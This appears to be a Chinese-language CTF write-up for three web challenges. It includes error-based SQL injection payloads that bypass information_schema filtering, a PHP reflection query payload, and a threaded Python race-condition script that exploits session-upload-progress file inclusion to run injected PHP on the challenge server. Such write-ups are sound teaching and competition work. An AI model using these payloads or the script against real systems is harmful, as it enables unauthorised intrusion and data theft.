先放上比赛时解出的题,剩下的题目等wp之后再慢慢复现吧
easy_sql#
报错注入
information_schema sys 全被过滤
参考mysql 注入 information_schema_绕过IDS过滤information_schema继续注入_宇文数学的博客-CSDN博客
1
|
admin')and(select extractvalue(1,concat(0x7e,(select * from users where id=1 and Polygon(id)))))%23
|
出security.
users.
id 知道库名,一个表名和一个列
之后爆user除了id以为的列名,然后看user表发现没有有用的东西
盲猜应该是在其他表里,随便试了个flag,发现真的有这个表
1
|
and(select extractvalue(1,concat(0x7e,(select * from(select * from flag a join flag b)c))))
|
然后就是加上using测其他
1
|
and(select extractvalue(1,concat(0x7e,(select * from(select * from flag a join flag b using(id))c))))
|
测出flag有625b4d5d-a34a-4843-8e09-70e91ef003a9
字段,一看就很不正常,读一下发现是flag
1
|
and(select extractvalue(1,concat(0x7e,(select group_concat(`625b4d5d-a34a-4843-8e09-70e91ef003a9`) from flag))))
|
发现显示不全
用right看没显示全的部分
easy_source#
原题
https://r0yanx.com/2020/10/28/fslh-writeup/
payload:?rc=ReflectionMethod&ra=User&rb=q&rd=getDocComment
middle_source#
看../../../../../../../../etc/apache2/envvars发现有个PHP_SESSION_UPLOAD_PROGRESS
扫目录发现有个.listing
访问/.listing 发现有个you_can_seeeeeeee_me.php,访问发现是个phpinfo()
基本确认是PHP_SESSION_UPLOAD_PROGRESS的本地包含
然后参考https://blog.csdn.net/mochu7777777/article/details/116499336的脚本加上条件竞争
sess的目录可以在phpinfo中找到是/var/lib/php/sessions/dhbiedjbgc/
然后就是从/etc/开始找起找一下奇怪字符串组成的目录,第一个目录比较难找其他就目录下就一个文件夹,一直找下去直到发现fl444444g
最后读一下/etc/dbeicagidd/eeaefabfif/bfcaciaahd/cbbfaadhee/efbibeigci/fl444444g
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
#coding=utf-8
import io
import threading
import requests
url='http://124.71.225.249:23817/'
sessid = 'abcd'
f = io.BytesIO(b'a' * 1024 * 50)
mydata = {'PHP_SESSION_UPLOAD_PROGRESS': '<?php $c = scandir("/etc/dbeicagidd/eeaefabfif/bfcaciaahd/cbbfaadhee/efbibeigci/fl444444g");var_dump($c);?>',"field":"abcababab","cf":"../../../../../../../../var/lib/php/sessions/dhbiedjbgc/sess_"+sessid}
myfile={'file': ('abcd.txt',f)}
mycookie={'PHPSESSID': sessid}
def read(session):
while True:
res = session.post(url, data=mydata, files=myfile, cookies=mycookie )
if(len(res.text) != 2037):
print(res.text)
if __name__=="__main__":
event=threading.Event()
with requests.session() as session:
for i in range(1,20):
threading.Thread(target=read,args=(session,)).start()
event.set()
|